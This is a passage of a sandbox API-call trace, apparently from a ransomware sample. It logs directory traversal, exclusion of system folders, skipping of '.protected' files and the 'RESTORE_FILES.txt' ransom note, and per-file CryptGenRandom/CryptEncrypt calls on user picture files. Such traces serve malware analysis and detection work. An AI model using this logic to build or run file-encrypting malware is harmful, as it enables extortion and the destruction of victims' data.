1 [0093.239] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.239] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp\\RESTORE_FILES.txt") returned 67 [0093.239] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.239] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.239] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.239] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.239] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp\\RESTORE_FILES.txt") returned 67 [0093.239] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All 
Users\\Microsoft\\Search\\Data\\Temp\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\temp\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.239] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.239] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.240] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\RESTORE_FILES.txt") returned 62 [0093.240] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.240] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.240] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.240] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.240] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.240] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.240] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.240] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\RESTORE_FILES.txt") returned 57 [0093.240] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.240] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.240] 
FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.240] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.240] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\RESTORE_FILES.txt") returned 57 [0093.240] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\search\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.241] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.241] lstrcmpiW (lpString1="User Account Pictures", lpString2="Windows") returned -1 [0093.241] lstrcmpiW (lpString1="User Account Pictures", lpString2="Program Files") returned 1 [0093.241] lstrcmpiW (lpString1="User Account Pictures", lpString2="Program Files (x86)") returned 1 [0093.241] lstrcmpiW (lpString1="User Account Pictures", lpString2="$Recycle.bin") returned 1 [0093.241] lstrcmpiW (lpString1="User Account Pictures", lpString2="System Volume Information") returned 1 [0093.241] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures") returned 54 [0093.241] lstrcmpW (lpString1="User Account Pictures", lpString2=".") returned 1 [0093.241] lstrcmpW (lpString1="User Account Pictures", lpString2="..") returned 1 [0093.241] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\*") returned 56 [0093.242] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 
0x47b9d0 [0093.242] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.242] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.242] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.242] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.242] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.242] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\.") returned 56 [0093.242] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.242] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.242] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.242] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.242] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.242] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.242] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.242] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\..") returned 57 [0093.242] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.242] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.242] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.242] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat.protected", lpString2="Windows") returned -1 [0093.242] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat.protected", lpString2="Program Files") returned -1 [0093.242] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat.protected", lpString2="Program Files (x86)") returned -1 [0093.242] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat.protected", lpString2="$Recycle.bin") returned 1 
[0093.242] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat.protected", lpString2="System Volume Information") returned -1 [0093.242] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\5p5NrGJn0jS HALPmcxz.dat.protected") returned 89 [0093.242] StrStrIW (lpFirst="5p5NrGJn0jS HALPmcxz.dat.protected", lpSrch=".protected") returned=".protected" [0093.242] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.242] lstrcmpiW (lpString1="Default Pictures", lpString2="Windows") returned -1 [0093.242] lstrcmpiW (lpString1="Default Pictures", lpString2="Program Files") returned -1 [0093.242] lstrcmpiW (lpString1="Default Pictures", lpString2="Program Files (x86)") returned -1 [0093.242] lstrcmpiW (lpString1="Default Pictures", lpString2="$Recycle.bin") returned 1 [0093.242] lstrcmpiW (lpString1="Default Pictures", lpString2="System Volume Information") returned -1 [0093.242] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures") returned 71 [0093.242] lstrcmpW (lpString1="Default Pictures", lpString2=".") returned 1 [0093.242] lstrcmpW (lpString1="Default Pictures", lpString2="..") returned 1 [0093.243] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*") returned 73 [0093.243] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.243] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.243] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.243] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.243] 
lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.243] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.243] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\.") returned 73 [0093.243] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.243] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.243] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.243] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.243] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.243] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.243] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.243] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\..") returned 74 [0093.243] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.243] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.244] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.244] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.244] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.244] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.244] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.244] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.244] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default 
Pictures\\RESTORE_FILES.txt") returned 89 [0093.244] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.244] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.244] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.244] lstrcmpiW (lpString1="usertile10.bmp", lpString2="Windows") returned -1 [0093.244] lstrcmpiW (lpString1="usertile10.bmp", lpString2="Program Files") returned 1 [0093.244] lstrcmpiW (lpString1="usertile10.bmp", lpString2="Program Files (x86)") returned 1 [0093.244] lstrcmpiW (lpString1="usertile10.bmp", lpString2="$Recycle.bin") returned 1 [0093.244] lstrcmpiW (lpString1="usertile10.bmp", lpString2="System Volume Information") returned 1 [0093.244] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp") returned 86 [0093.244] StrStrIW (lpFirst="usertile10.bmp", lpSrch=".protected") returned 0x0 [0093.244] lstrcmpW (lpString1="usertile10.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.244] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.244] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.244] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile10.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.244] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) 
returned 1 [0093.244] lstrcmpiW (lpString1="usertile11.bmp", lpString2="Windows") returned -1 [0093.244] lstrcmpiW (lpString1="usertile11.bmp", lpString2="Program Files") returned 1 [0093.244] lstrcmpiW (lpString1="usertile11.bmp", lpString2="Program Files (x86)") returned 1 [0093.244] lstrcmpiW (lpString1="usertile11.bmp", lpString2="$Recycle.bin") returned 1 [0093.244] lstrcmpiW (lpString1="usertile11.bmp", lpString2="System Volume Information") returned 1 [0093.244] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp") returned 86 [0093.244] StrStrIW (lpFirst="usertile11.bmp", lpSrch=".protected") returned 0x0 [0093.244] lstrcmpW (lpString1="usertile11.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.244] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.244] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.244] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile11.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.244] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.244] lstrcmpiW (lpString1="usertile12.bmp", lpString2="Windows") returned -1 [0093.244] lstrcmpiW (lpString1="usertile12.bmp", lpString2="Program Files") returned 1 [0093.245] lstrcmpiW (lpString1="usertile12.bmp", lpString2="Program Files (x86)") returned 1 [0093.245] lstrcmpiW (lpString1="usertile12.bmp", 
lpString2="$Recycle.bin") returned 1 [0093.245] lstrcmpiW (lpString1="usertile12.bmp", lpString2="System Volume Information") returned 1 [0093.245] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp") returned 86 [0093.245] StrStrIW (lpFirst="usertile12.bmp", lpSrch=".protected") returned 0x0 [0093.245] lstrcmpW (lpString1="usertile12.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.245] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.245] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.245] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile12.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.245] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.245] lstrcmpiW (lpString1="usertile13.bmp", lpString2="Windows") returned -1 [0093.245] lstrcmpiW (lpString1="usertile13.bmp", lpString2="Program Files") returned 1 [0093.245] lstrcmpiW (lpString1="usertile13.bmp", lpString2="Program Files (x86)") returned 1 [0093.245] lstrcmpiW (lpString1="usertile13.bmp", lpString2="$Recycle.bin") returned 1 [0093.245] lstrcmpiW (lpString1="usertile13.bmp", lpString2="System Volume Information") returned 1 [0093.245] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp") 
returned 86 [0093.245] StrStrIW (lpFirst="usertile13.bmp", lpSrch=".protected") returned 0x0 [0093.245] lstrcmpW (lpString1="usertile13.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.245] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.245] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.245] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile13.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.245] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.245] lstrcmpiW (lpString1="usertile14.bmp", lpString2="Windows") returned -1 [0093.245] lstrcmpiW (lpString1="usertile14.bmp", lpString2="Program Files") returned 1 [0093.245] lstrcmpiW (lpString1="usertile14.bmp", lpString2="Program Files (x86)") returned 1 [0093.245] lstrcmpiW (lpString1="usertile14.bmp", lpString2="$Recycle.bin") returned 1 [0093.245] lstrcmpiW (lpString1="usertile14.bmp", lpString2="System Volume Information") returned 1 [0093.245] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp") returned 86 [0093.245] StrStrIW (lpFirst="usertile14.bmp", lpSrch=".protected") returned 0x0 [0093.245] lstrcmpW (lpString1="usertile14.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.245] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.245] CryptEncrypt (in: 
hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.245] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile14.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.246] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.246] lstrcmpiW (lpString1="usertile15.bmp", lpString2="Windows") returned -1 [0093.246] lstrcmpiW (lpString1="usertile15.bmp", lpString2="Program Files") returned 1 [0093.246] lstrcmpiW (lpString1="usertile15.bmp", lpString2="Program Files (x86)") returned 1 [0093.246] lstrcmpiW (lpString1="usertile15.bmp", lpString2="$Recycle.bin") returned 1 [0093.246] lstrcmpiW (lpString1="usertile15.bmp", lpString2="System Volume Information") returned 1 [0093.246] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp") returned 86 [0093.246] StrStrIW (lpFirst="usertile15.bmp", lpSrch=".protected") returned 0x0 [0093.246] lstrcmpW (lpString1="usertile15.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.246] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.246] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.246] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp" (normalized: "c:\\users\\all 
users\\microsoft\\user account pictures\\default pictures\\usertile15.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.246] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.246] lstrcmpiW (lpString1="usertile16.bmp", lpString2="Windows") returned -1 [0093.246] lstrcmpiW (lpString1="usertile16.bmp", lpString2="Program Files") returned 1 [0093.246] lstrcmpiW (lpString1="usertile16.bmp", lpString2="Program Files (x86)") returned 1 [0093.246] lstrcmpiW (lpString1="usertile16.bmp", lpString2="$Recycle.bin") returned 1 [0093.246] lstrcmpiW (lpString1="usertile16.bmp", lpString2="System Volume Information") returned 1 [0093.246] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp") returned 86 [0093.246] StrStrIW (lpFirst="usertile16.bmp", lpSrch=".protected") returned 0x0 [0093.246] lstrcmpW (lpString1="usertile16.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.246] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.246] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.246] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile16.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.246] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: 
lpFindFileData=0x295ecb0) returned 1 [0093.246] lstrcmpiW (lpString1="usertile17.bmp", lpString2="Windows") returned -1 [0093.246] lstrcmpiW (lpString1="usertile17.bmp", lpString2="Program Files") returned 1 [0093.246] lstrcmpiW (lpString1="usertile17.bmp", lpString2="Program Files (x86)") returned 1 [0093.246] lstrcmpiW (lpString1="usertile17.bmp", lpString2="$Recycle.bin") returned 1 [0093.246] lstrcmpiW (lpString1="usertile17.bmp", lpString2="System Volume Information") returned 1 [0093.246] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp") returned 86 [0093.246] StrStrIW (lpFirst="usertile17.bmp", lpSrch=".protected") returned 0x0 [0093.246] lstrcmpW (lpString1="usertile17.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.246] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.246] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.247] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile17.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.247] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.247] lstrcmpiW (lpString1="usertile18.bmp", lpString2="Windows") returned -1 [0093.247] lstrcmpiW (lpString1="usertile18.bmp", lpString2="Program Files") returned 1 [0093.247] lstrcmpiW (lpString1="usertile18.bmp", lpString2="Program Files (x86)") returned 1 [0093.247] lstrcmpiW 
(lpString1="usertile18.bmp", lpString2="$Recycle.bin") returned 1 [0093.247] lstrcmpiW (lpString1="usertile18.bmp", lpString2="System Volume Information") returned 1 [0093.247] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp") returned 86 [0093.247] StrStrIW (lpFirst="usertile18.bmp", lpSrch=".protected") returned 0x0 [0093.247] lstrcmpW (lpString1="usertile18.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.247] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.247] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.247] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile18.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.247] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.247] lstrcmpiW (lpString1="usertile19.bmp", lpString2="Windows") returned -1 [0093.247] lstrcmpiW (lpString1="usertile19.bmp", lpString2="Program Files") returned 1 [0093.247] lstrcmpiW (lpString1="usertile19.bmp", lpString2="Program Files (x86)") returned 1 [0093.247] lstrcmpiW (lpString1="usertile19.bmp", lpString2="$Recycle.bin") returned 1 [0093.247] lstrcmpiW (lpString1="usertile19.bmp", lpString2="System Volume Information") returned 1 [0093.247] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default 
